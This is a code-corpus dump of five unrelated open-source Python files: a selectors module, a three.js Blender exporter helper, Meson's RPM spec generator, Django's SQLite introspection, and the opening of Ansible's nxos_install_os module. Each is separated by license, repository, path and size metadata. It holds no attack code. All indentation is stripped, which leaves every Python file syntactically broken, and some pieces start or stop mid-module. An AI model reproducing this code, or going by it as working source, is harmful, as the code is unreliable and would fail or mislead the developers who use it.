raise OSError(errno=errno.ETIMEDOUT)
if recalc_timeout:
if "timeout" in kwargs:
kwargs["timeout"] = expires - current_time
continue
if errcode:
raise SelectorError(errcode)
else:
raise
return result
SelectorKey = namedtuple('SelectorKey', ['fileobj', 'fd', 'events', 'data'])
class _SelectorMapping(Mapping):
""" Mapping of file objects to selector keys """
def __init__(self, selector):
self._selector = selector
def __len__(self):
return len(self._selector._fd_to_key)
def __getitem__(self, fileobj):
try:
fd = self._selector._fileobj_lookup(fileobj)
return self._selector._fd_to_key[fd]
except KeyError:
raise KeyError("{0!r} is not registered.".format(fileobj))
def __iter__(self):
return iter(self._selector._fd_to_key)
class BaseSelector(object):
""" Abstract Selector class
A selector supports registering file objects to be monitored
for specific I/O events.
A file object is a file descriptor or any object with a
`fileno()` method. An arbitrary object can be attached to the
file object which can be used for example to store context info,
a callback, etc.
A selector can use various implementations (select(), poll(), epoll(),
and kqueue()) depending on the platform. The 'DefaultSelector' class uses
the most efficient implementation for the current platform.
"""
def __init__(self):
# Maps file descriptors to keys.
self._fd_to_key = {}
# Read-only mapping returned by get_map()
self._map = _SelectorMapping(self)
def _fileobj_lookup(self, fileobj):
""" Return a file descriptor from a file object.
This wraps _fileobj_to_fd() to do an exhaustive
search in case the object is invalid but we still
have it in our map. Used by unregister() so we can
unregister an object that was previously registered
even if it is closed. It is also used by _SelectorMapping
"""
try:
return _fileobj_to_fd(fileobj)
except ValueError:
# Search through all our mapped keys.
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
return key.fd
# Raise ValueError after all.
raise
def register(self, fileobj, events, data=None):
""" Register a file object for a set of events to monitor. """
if (not events) or (events & ~(EVENT_READ | EVENT_WRITE)):
raise ValueError("Invalid events: {0!r}".format(events))
key = SelectorKey(fileobj, self._fileobj_lookup(fileobj), events, data)
if key.fd in self._fd_to_key:
raise KeyError("{0!r} (FD {1}) is already registered"
.format(fileobj, key.fd))
self._fd_to_key[key.fd] = key
return key
def unregister(self, fileobj):
""" Unregister a file object from being monitored. """
try:
key = self._fd_to_key.pop(self._fileobj_lookup(fileobj))
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
# Getting the fileno of a closed socket on Windows errors with EBADF.
except socket.error as err:
if err.errno != errno.EBADF:
raise
else:
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
self._fd_to_key.pop(key.fd)
break
else:
raise KeyError("{0!r} is not registered".format(fileobj))
return key
def modify(self, fileobj, events, data=None):
""" Change a registered file object monitored events and data. """
# NOTE: Some subclasses optimize this operation even further.
try:
key = self._fd_to_key[self._fileobj_lookup(fileobj)]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
if events != key.events:
self.unregister(fileobj)
key = self.register(fileobj, events, data)
elif data != key.data:
# Use a shortcut to update the data.
key = key._replace(data=data)
self._fd_to_key[key.fd] = key
return key
def select(self, timeout=None):
""" Perform the actual selection until some monitored file objects
are ready or the timeout expires. """
raise NotImplementedError()
def close(self):
""" Close the selector. This must be called to ensure that all
underlying resources are freed. """
self._fd_to_key.clear()
self._map = None
def get_key(self, fileobj):
""" Return the key associated with a registered file object. """
mapping = self.get_map()
if mapping is None:
raise RuntimeError("Selector is closed")
try:
return mapping[fileobj]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
def get_map(self):
""" Return a mapping of file objects to selector keys """
return self._map
def _key_from_fd(self, fd):
""" Return the key associated to a given file descriptor
Return None if it is not found. """
try:
return self._fd_to_key[fd]
except KeyError:
return None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# Almost all platforms have select.select()
if hasattr(select, "select"):
class SelectSelector(BaseSelector):
""" Select-based selector. """
def __init__(self):
super(SelectSelector, self).__init__()
self._readers = set()
self._writers = set()
def register(self, fileobj, events, data=None):
key = super(SelectSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
self._readers.add(key.fd)
if events & EVENT_WRITE:
self._writers.add(key.fd)
return key
def unregister(self, fileobj):
key = super(SelectSelector, self).unregister(fileobj)
self._readers.discard(key.fd)
self._writers.discard(key.fd)
return key
def _select(self, r, w, timeout=None):
""" Wrapper for select.select because timeout is a positional arg """
return select.select(r, w, [], timeout)
def select(self, timeout=None):
# Selecting on empty lists on Windows errors out.
if not len(self._readers) and not len(self._writers):
return []
timeout = None if timeout is None else max(timeout, 0.0)
ready = []
r, w, _ = _syscall_wrapper(self._select, True, self._readers,
self._writers, timeout)
r = set(r)
w = set(w)
for fd in r | w:
events = 0
if fd in r:
events |= EVENT_READ
if fd in w:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
__all__.append('SelectSelector')
if hasattr(select, "poll"):
class PollSelector(BaseSelector):
""" Poll-based selector """
def __init__(self):
super(PollSelector, self).__init__()
self._poll = select.poll()
def register(self, fileobj, events, data=None):
key = super(PollSelector, self).register(fileobj, events, data)
event_mask = 0
if events & EVENT_READ:
event_mask |= select.POLLIN
if events & EVENT_WRITE:
event_mask |= select.POLLOUT
self._poll.register(key.fd, event_mask)
return key
def unregister(self, fileobj):
key = super(PollSelector, self).unregister(fileobj)
self._poll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.poll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._poll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
__all__.append('PollSelector')
if hasattr(select, "epoll"):
class EpollSelector(BaseSelector):
""" Epoll-based selector """
def __init__(self):
super(EpollSelector, self).__init__()
self._epoll = select.epoll()
def fileno(self):
return self._epoll.fileno()
def register(self, fileobj, events, data=None):
key = super(EpollSelector, self).register(fileobj, events, data)
events_mask = 0
if events & EVENT_READ:
events_mask |= select.EPOLLIN
if events & EVENT_WRITE:
events_mask |= select.EPOLLOUT
_syscall_wrapper(self._epoll.register, False, key.fd, events_mask)
return key
def unregister(self, fileobj):
key = super(EpollSelector, self).unregister(fileobj)
try:
_syscall_wrapper(self._epoll.unregister, False, key.fd)
except SelectorError:
# This can occur when the fd was closed since registry.
pass
return key
def select(self, timeout=None):
if timeout is not None:
if timeout <= 0:
timeout = 0.0
else:
# select.epoll.poll() has a resolution of 1 millisecond
# but luckily takes seconds so we don't need a wrapper
# like PollSelector. Just for better rounding.
timeout = math.ceil(timeout * 1e3) * 1e-3
timeout = float(timeout)
else:
timeout = -1.0 # epoll.poll() must have a float.
# We always want at least 1 to ensure that select can be called
# with no file descriptors registered. Otherwise will fail.
max_events = max(len(self._fd_to_key), 1)
ready = []
fd_events = _syscall_wrapper(self._epoll.poll, True,
timeout=timeout,
maxevents=max_events)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.EPOLLIN:
events |= EVENT_WRITE
if event_mask & ~select.EPOLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._epoll.close()
super(EpollSelector, self).close()
__all__.append('EpollSelector')
if hasattr(select, "devpoll"):
class DevpollSelector(BaseSelector):
"""Solaris /dev/poll selector."""
def __init__(self):
super(DevpollSelector, self).__init__()
self._devpoll = select.devpoll()
def fileno(self):
return self._devpoll.fileno()
def register(self, fileobj, events, data=None):
key = super(DevpollSelector, self).register(fileobj, events, data)
poll_events = 0
if events & EVENT_READ:
poll_events |= select.POLLIN
if events & EVENT_WRITE:
poll_events |= select.POLLOUT
self._devpoll.register(key.fd, poll_events)
return key
def unregister(self, fileobj):
key = super(DevpollSelector, self).unregister(fileobj)
self._devpoll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.devpoll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._devpoll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._devpoll.close()
super(DevpollSelector, self).close()
__all__.append('DevpollSelector')
if hasattr(select, "kqueue"):
class KqueueSelector(BaseSelector):
""" Kqueue / Kevent-based selector """
def __init__(self):
super(KqueueSelector, self).__init__()
self._kqueue = select.kqueue()
def fileno(self):
return self._kqueue.fileno()
def register(self, fileobj, events, data=None):
key = super(KqueueSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
if events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
return key
def unregister(self, fileobj):
key = super(KqueueSelector, self).unregister(fileobj)
if key.events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
if key.events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
return key
def select(self, timeout=None):
if timeout is not None:
timeout = max(timeout, 0)
max_events = len(self._fd_to_key) * 2
ready_fds = {}
kevent_list = _syscall_wrapper(self._kqueue.control, True,
None, max_events, timeout)
for kevent in kevent_list:
fd = kevent.ident
event_mask = kevent.filter
events = 0
if event_mask == select.KQ_FILTER_READ:
events |= EVENT_READ
if event_mask == select.KQ_FILTER_WRITE:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
if key.fd not in ready_fds:
ready_fds[key.fd] = (key, events & key.events)
else:
old_events = ready_fds[key.fd][1]
ready_fds[key.fd] = (key, (events | old_events) & key.events)
return list(ready_fds.values())
def close(self):
self._kqueue.close()
super(KqueueSelector, self).close()
__all__.append('KqueueSelector')
# Choose the best implementation, roughly:
# kqueue == epoll == devpoll > poll > select.
# select() also can't accept a FD > FD_SETSIZE (usually around 1024)
if 'KqueueSelector' in globals(): # Platform-specific: Mac OS and BSD
DefaultSelector = KqueueSelector
elif 'DevpollSelector' in globals():
DefaultSelector = DevpollSelector
elif 'EpollSelector' in globals(): # Platform-specific: Linux
DefaultSelector = EpollSelector
elif 'PollSelector' in globals(): # Platform-specific: Linux
DefaultSelector = PollSelector
elif 'SelectSelector' in globals(): # Platform-specific: Windows
DefaultSelector = SelectSelector
else: # Platform-specific: AppEngine
def no_selector(_):
raise ValueError("Platform does not have a selector")
DefaultSelector = no_selector
HAS_SELECT = False
|
gpl-3.0
|
rgaino/three.js
|
utils/exporters/blender/addons/io_three/exporter/api/light.py
|
195
|
1099
|
from bpy import data, types
from .. import utilities, logger
def _lamp(func):
"""
:param func:
"""
def inner(name, *args, **kwargs):
"""
:param name:
:param *args:
:param **kwargs:
"""
if isinstance(name, types.Lamp):
lamp = name
else:
lamp = data.lamps[name]
return func(lamp, *args, **kwargs)
return inner
@_lamp
def angle(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.angle(%s)", lamp)
return lamp.spot_size
@_lamp
def color(lamp):
"""
:param lamp:
:rtype: int
"""
logger.debug("light.color(%s)", lamp)
colour = (lamp.color.r, lamp.color.g, lamp.color.b)
return utilities.rgb2int(colour)
@_lamp
def distance(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.distance(%s)", lamp)
return lamp.distance
@_lamp
def intensity(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.intensity(%s)", lamp)
return round(lamp.energy, 2)
|
mit
|
pexip/meson
|
mesonbuild/modules/rpm.py
|
2
|
8284
|
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This module provides helper functions for RPM related
functionality such as generating template RPM spec file.'''
from .. import build
from .. import compilers
import datetime
from .. import mlog
from . import GirTarget, TypelibTarget
from . import ModuleReturnValue
from . import ExtensionModule
from ..interpreterbase import noKwargs
import os
class RPMModule(ExtensionModule):
@noKwargs
def generate_spec_template(self, coredata, args, kwargs):
self.coredata = coredata
required_compilers = self.__get_required_compilers()
proj = coredata.project_name.replace(' ', '_').replace('\t', '_')
so_installed = False
devel_subpkg = False
files = set()
files_devel = set()
to_delete = set()
for target in coredata.targets.values():
if isinstance(target, build.Executable) and target.need_install:
files.add('%%{_bindir}/%s' % target.get_filename())
elif isinstance(target, build.SharedLibrary) and target.need_install:
files.add('%%{_libdir}/%s' % target.get_filename())
for alias in target.get_aliases():
if alias.endswith('.so'):
files_devel.add('%%{_libdir}/%s' % alias)
else:
files.add('%%{_libdir}/%s' % alias)
so_installed = True
elif isinstance(target, build.StaticLibrary) and target.need_install:
to_delete.add('%%{buildroot}%%{_libdir}/%s' % target.get_filename())
mlog.warning('removing', mlog.bold(target.get_filename()),
'from package because packaging static libs not recommended')
elif isinstance(target, GirTarget) and target.should_install():
files_devel.add('%%{_datadir}/gir-1.0/%s' % target.get_filename()[0])
elif isinstance(target, TypelibTarget) and target.should_install():
files.add('%%{_libdir}/girepository-1.0/%s' % target.get_filename()[0])
for header in coredata.headers:
if header.get_install_subdir():
files_devel.add('%%{_includedir}/%s/' % header.get_install_subdir())
else:
for hdr_src in header.get_sources():
files_devel.add('%%{_includedir}/%s' % hdr_src)
for man in coredata.man:
for man_file in man.get_sources():
files.add('%%{_mandir}/man%u/%s.*' % (int(man_file.split('.')[-1]), man_file))
if files_devel:
devel_subpkg = True
filename = os.path.join(coredata.environment.get_build_dir(),
'%s.spec' % proj)
with open(filename, 'w+') as fn:
fn.write('Name: %s\n' % proj)
fn.write('Version: # FIXME\n')
fn.write('Release: 1%{?dist}\n')
fn.write('Summary: # FIXME\n')
fn.write('License: # FIXME\n')
fn.write('\n')
fn.write('Source0: %{name}-%{version}.tar.xz # FIXME\n')
fn.write('\n')
fn.write('BuildRequires: meson\n')
for compiler in required_compilers:
fn.write('BuildRequires: %s\n' % compiler)
for dep in coredata.environment.coredata.deps.host:
fn.write('BuildRequires: pkgconfig(%s)\n' % dep[0])
# ext_libs and ext_progs have been removed from coredata so the following code
# no longer works. It is kept as a reminder of the idea should anyone wish
# to re-implement it.
#
# for lib in state.environment.coredata.ext_libs.values():
# name = lib.get_name()
# fn.write('BuildRequires: {} # FIXME\n'.format(name))
# mlog.warning('replace', mlog.bold(name), 'with the real package.',
# 'You can use following command to find package which '
# 'contains this lib:',
# mlog.bold("dnf provides '*/lib{}.so'".format(name)))
# for prog in state.environment.coredata.ext_progs.values():
# if not prog.found():
# fn.write('BuildRequires: %%{_bindir}/%s # FIXME\n' %
# prog.get_name())
# else:
# fn.write('BuildRequires: {}\n'.format(prog.get_path()))
fn.write('\n')
fn.write('%description\n')
fn.write('\n')
if devel_subpkg:
fn.write('%package devel\n')
fn.write('Summary: Development files for %{name}\n')
fn.write('Requires: %{name}%{?_isa} = %{?epoch:%{epoch}:}{version}-%{release}\n')
fn.write('\n')
fn.write('%description devel\n')
fn.write('Development files for %{name}.\n')
fn.write('\n')
fn.write('%prep\n')
fn.write('%autosetup\n')
fn.write('\n')
fn.write('%build\n')
fn.write('%meson\n')
fn.write('%meson_build\n')
fn.write('\n')
fn.write('%install\n')
fn.write('%meson_install\n')
if to_delete:
fn.write('rm -vf %s\n' % ' '.join(to_delete))
fn.write('\n')
fn.write('%check\n')
fn.write('%meson_test\n')
fn.write('\n')
fn.write('%files\n')
for f in files:
fn.write('%s\n' % f)
fn.write('\n')
if devel_subpkg:
fn.write('%files devel\n')
for f in files_devel:
fn.write('%s\n' % f)
fn.write('\n')
if so_installed:
fn.write('%post -p /sbin/ldconfig\n')
fn.write('%postun -p /sbin/ldconfig\n')
fn.write('\n')
fn.write('%changelog\n')
fn.write('* %s meson <[email protected]> - \n' %
datetime.date.today().strftime('%a %b %d %Y'))
fn.write('- \n')
fn.write('\n')
mlog.log('RPM spec template written to %s.spec.\n' % proj)
return ModuleReturnValue(None, [])
def __get_required_compilers(self):
required_compilers = set()
for compiler in self.coredata.compilers.values():
# Elbrus has one 'lcc' package for every compiler
if isinstance(compiler, compilers.GnuCCompiler):
required_compilers.add('gcc')
elif isinstance(compiler, compilers.GnuCPPCompiler):
required_compilers.add('gcc-c++')
elif isinstance(compiler, compilers.ElbrusCCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ElbrusCPPCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ElbrusFortranCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ValaCompiler):
required_compilers.add('vala')
elif isinstance(compiler, compilers.GnuFortranCompiler):
required_compilers.add('gcc-gfortran')
elif isinstance(compiler, compilers.GnuObjCCompiler):
required_compilers.add('gcc-objc')
elif compiler == compilers.GnuObjCPPCompiler:
required_compilers.add('gcc-objc++')
else:
mlog.log('RPM spec file not created, generation not allowed for:',
mlog.bold(compiler.get_id()))
return required_compilers
def initialize(*args, **kwargs):
return RPMModule(*args, **kwargs)
|
apache-2.0
|
RobertWWong/WebDev
|
djangoApp/ENV/lib/python3.5/site-packages/django/db/backends/sqlite3/introspection.py
|
44
|
12308
|
import re
import warnings
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.db.models.indexes import Index
from django.utils.deprecation import RemovedInDjango21Warning
field_size_re = re.compile(r'^\s*(?:var)?char\s*\(\s*(\d+)\s*\)\s*$')
def get_field_size(name):
""" Extract the size number from a "varchar(11)" type name """
m = field_size_re.search(name)
return int(m.group(1)) if m else None
# This light wrapper "fakes" a dictionary interface, because some SQLite data
# types include variables in them -- e.g. "varchar(30)" -- and can't be matched
# as a simple dictionary lookup.
class FlexibleFieldLookupDict(object):
# Maps SQL types to Django Field types. Some of the SQL types have multiple
# entries here because SQLite allows for anything and doesn't normalize the
# field type; it uses whatever was given.
base_data_types_reverse = {
'bool': 'BooleanField',
'boolean': 'BooleanField',
'smallint': 'SmallIntegerField',
'smallint unsigned': 'PositiveSmallIntegerField',
'smallinteger': 'SmallIntegerField',
'int': 'IntegerField',
'integer': 'IntegerField',
'bigint': 'BigIntegerField',
'integer unsigned': 'PositiveIntegerField',
'decimal': 'DecimalField',
'real': 'FloatField',
'text': 'TextField',
'char': 'CharField',
'blob': 'BinaryField',
'date': 'DateField',
'datetime': 'DateTimeField',
'time': 'TimeField',
}
def __getitem__(self, key):
key = key.lower()
try:
return self.base_data_types_reverse[key]
except KeyError:
size = get_field_size(key)
if size is not None:
return ('CharField', {'max_length': size})
raise KeyError
class DatabaseIntrospection(BaseDatabaseIntrospection):
data_types_reverse = FlexibleFieldLookupDict()
def get_table_list(self, cursor):
"""
Returns a list of table and view names in the current database.
"""
# Skip the sqlite_sequence system table used for autoincrement key
# generation.
cursor.execute("""
SELECT name, type FROM sqlite_master
WHERE type in ('table', 'view') AND NOT name='sqlite_sequence'
ORDER BY name""")
return [TableInfo(row[0], row[1][0]) for row in cursor.fetchall()]
def get_table_description(self, cursor, table_name):
"Returns a description of the table, with the DB-API cursor.description interface."
return [
FieldInfo(
info['name'],
info['type'],
None,
info['size'],
None,
None,
info['null_ok'],
info['default'],
) for info in self._table_info(cursor, table_name)
]
def column_name_converter(self, name):
"""
SQLite will in some cases, e.g. when returning columns from views and
subselects, return column names in 'alias."column"' format instead of
simply 'column'.
Affects SQLite < 3.7.15, fixed by http://www.sqlite.org/src/info/5526e0aa3c
"""
# TODO: remove when SQLite < 3.7.15 is sufficiently old.
# 3.7.13 ships in Debian stable as of 2014-03-21.
if self.connection.Database.sqlite_version_info < (3, 7, 15):
return name.split('.')[-1].strip('"')
else:
return name
def get_relations(self, cursor, table_name):
"""
Return a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
# Dictionary of relations to return
relations = {}
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
try:
results = cursor.fetchone()[0].strip()
except TypeError:
# It might be a view, then no results will be returned
return relations
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_desc in results.split(','):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'references (\S*) ?\(["|]?(.*)["|]?\)', field_desc, re.I)
if not m:
continue
table, column = [s.strip('"') for s in m.groups()]
if field_desc.startswith("FOREIGN KEY"):
# Find name of the target FK field
m = re.match(r'FOREIGN KEY\s*\(([^\)]*)\).*', field_desc, re.I)
field_name = m.groups()[0].strip('"')
else:
field_name = field_desc.split()[0].strip('"')
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s", [table])
result = cursor.fetchall()[0]
other_table_results = result[0].strip()
li, ri = other_table_results.index('('), other_table_results.rindex(')')
other_table_results = other_table_results[li + 1:ri]
for other_desc in other_table_results.split(','):
other_desc = other_desc.strip()
if other_desc.startswith('UNIQUE'):
continue
other_name = other_desc.split(' ', 1)[0].strip('"')
if other_name == column:
relations[field_name] = (other_name, table)
break
return relations
def get_key_columns(self, cursor, table_name):
"""
Returns a list of (column_name, referenced_table_name, referenced_column_name) for all
key columns in given table.
"""
key_columns = []
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
results = cursor.fetchone()[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_index, field_desc in enumerate(results.split(',')):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'"(.*)".*references (.*) \(["|](.*)["|]\)', field_desc, re.I)
if not m:
continue
# This will append (column_name, referenced_table_name, referenced_column_name) to key_columns
key_columns.append(tuple(s.strip('"') for s in m.groups()))
return key_columns
def get_indexes(self, cursor, table_name):
warnings.warn(
"get_indexes() is deprecated in favor of get_constraints().",
RemovedInDjango21Warning, stacklevel=2
)
indexes = {}
for info in self._table_info(cursor, table_name):
if info['pk'] != 0:
indexes[info['name']] = {'primary_key': True,
'unique': False}
cursor.execute('PRAGMA index_list(%s)' % self.connection.ops.quote_name(table_name))
# seq, name, unique
for index, unique in [(field[1], field[2]) for field in cursor.fetchall()]:
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
info = cursor.fetchall()
# Skip indexes across multiple fields
if len(info) != 1:
continue
name = info[0][2] # seqno, cid, name
indexes[name] = {'primary_key': indexes.get(name, {}).get("primary_key", False),
'unique': unique}
return indexes
def get_primary_key_column(self, cursor, table_name):
"""
Get the column name of the primary key for the given table.
"""
# Don't use PRAGMA because that causes issues with some transactions
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
row = cursor.fetchone()
if row is None:
raise ValueError("Table %s does not exist" % table_name)
results = row[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
for field_desc in results.split(','):
field_desc = field_desc.strip()
m = re.search('"(.*)".*PRIMARY KEY( AUTOINCREMENT)?', field_desc)
if m:
return m.groups()[0]
return None
def _table_info(self, cursor, name):
cursor.execute('PRAGMA table_info(%s)' % self.connection.ops.quote_name(name))
# cid, name, type, notnull, default_value, pk
return [{
'name': field[1],
'type': field[2],
'size': get_field_size(field[2]),
'null_ok': not field[3],
'default': field[4],
'pk': field[5], # undocumented
} for field in cursor.fetchall()]
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
"""
constraints = {}
# Get the index info
cursor.execute("PRAGMA index_list(%s)" % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Sqlite3 3.8.9+ has 5 columns, however older versions only give 3
# columns. Discard last 2 columns if there.
number, index, unique = row[:3]
# Get the index info for that index
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
for index_rank, column_rank, column in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": [],
"primary_key": False,
"unique": bool(unique),
"foreign_key": False,
"check": False,
"index": True,
}
constraints[index]['columns'].append(column)
# Add type and column orders for indexes
if constraints[index]['index'] and not constraints[index]['unique']:
# SQLite doesn't support any index type other than b-tree
constraints[index]['type'] = Index.suffix
cursor.execute(
"SELECT sql FROM sqlite_master "
"WHERE type='index' AND name=%s" % self.connection.ops.quote_name(index)
)
orders = []
# There would be only 1 row to loop over
for sql, in cursor.fetchall():
order_info = sql.split('(')[-1].split(')')[0].split(',')
orders = ['DESC' if info.endswith('DESC') else 'ASC' for info in order_info]
constraints[index]['orders'] = orders
# Get the PK
pk_column = self.get_primary_key_column(cursor, table_name)
if pk_column:
# SQLite doesn't actually give a name to the PK constraint,
# so we invent one. This is fine, as the SQLite backend never
# deletes PK constraints by name, as you can't delete constraints
# in SQLite; we remake the table with a new PK instead.
constraints["__primary__"] = {
"columns": [pk_column],
"primary_key": True,
"unique": False, # It's not actually a unique constraint.
"foreign_key": False,
"check": False,
"index": False,
}
return constraints
|
mit
|
dataxu/ansible
|
lib/ansible/modules/network/nxos/nxos_install_os.py
|
3
|
20862
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_install_os
extends_documentation_fragment: nxos
short_description: Set boot options like boot, kickstart image and issu.
description:
- Install an operating system by setting the boot options like boot
image and kickstart image and optionally select to install using
ISSU (In Server Software Upgrade).
notes:
- Tested against the following platforms and images
- N9k 7.0(3)I4(6), 7.0(3)I5(3), 7.0(3)I6(1), 7.0(3)I7(1), 7.0(3)F2(2), 7.0(3)F3(2)
- N3k 6.0(2)A8(6), 6.0(2)A8(8), 7.0(3)I6(1), 7.0(3)I7(1)
- N7k 7.3(0)D1(1), 8.0(1), 8.2(1)
- This module executes longer then the default ansible timeout value and
will generate errors unless the module timeout parameter is set to a
value of 500 seconds or higher.
The example time is sufficent for most upgrades but this can be
tuned higher based on specific upgrade time requirements.
The module will exit with a failure message if the timer is
not set to 500 seconds or higher.
- Do not include full file paths, just the name of the file(s) stored on
the top level flash directory.
- This module attempts to install the software immediately,
which may trigger a reboot.
- In check mode, the module will indicate if an upgrade is needed and
whether or not the upgrade is disruptive or non-disruptive(ISSU).
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbibo (@GGabriele)
version_added: 2.2
options:
system_image_file:
description:
- Name of the system (or combined) image file on flash.
required: true
kickstart_image_file:
description:
- Name of the kickstart image file on flash.
(Not required on all Nexus platforms)
required: false
default: null
issu:
version_added: "2.5"
description:
- Upgrade using In Service Software Upgrade (ISSU).
(Only supported on N9k platforms)
- Selecting 'required' or 'yes' means that upgrades will only
proceed if the switch is capable of ISSU.
- Selecting 'desired' means that upgrades will use ISSU if possible
but will fall back to disruptive upgrade if needed.
- Selecting 'no' means do not use ISSU. Forced disruptive.
required: false
choices: ['required','desired', 'yes', 'no']
default: 'no'
'''
EXAMPLES = '''
- name: Install OS on N9k
check_mode: no
nxos_install_os:
system_image_file: nxos.7.0.3.I6.1.bin
issu: desired
provider: "{{ connection | combine({'timeout': 500}) }}"
- name: Wait for device to come back up with new image
wait_for:
port: 22
state: started
timeout: 500
delay: 60
host: "{{ inventory_hostname }}"
- name: Check installed OS for newly installed version
nxos_command:
commands: ['show version | json']
provider: "{{ connection }}"
register: output
- assert:
that:
- output['stdout'][0]['kickstart_ver_str'] == '7.0(3)I6(1)'
'''
RETURN = '''
install_state:
description: Boot and install information.
returned: always
type: dictionary
sample: {
"install_state": [
"Compatibility check is done:",
"Module bootable Impact Install-type Reason",
"------ -------- -------------- ------------ ------",
" 1 yes non-disruptive reset ",
"Images will be upgraded according to following table:",
"Module Image Running-Version(pri:alt) New-Version Upg-Required",
"------ ---------- ---------------------------------------- -------------------- ------------",
" 1 nxos 7.0(3)I6(1) 7.0(3)I7(1) yes",
" 1 bios v4.4.0(07/12/2017) v4.4.0(07/12/2017) no"
],
}
'''
import re
from time import sleep
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
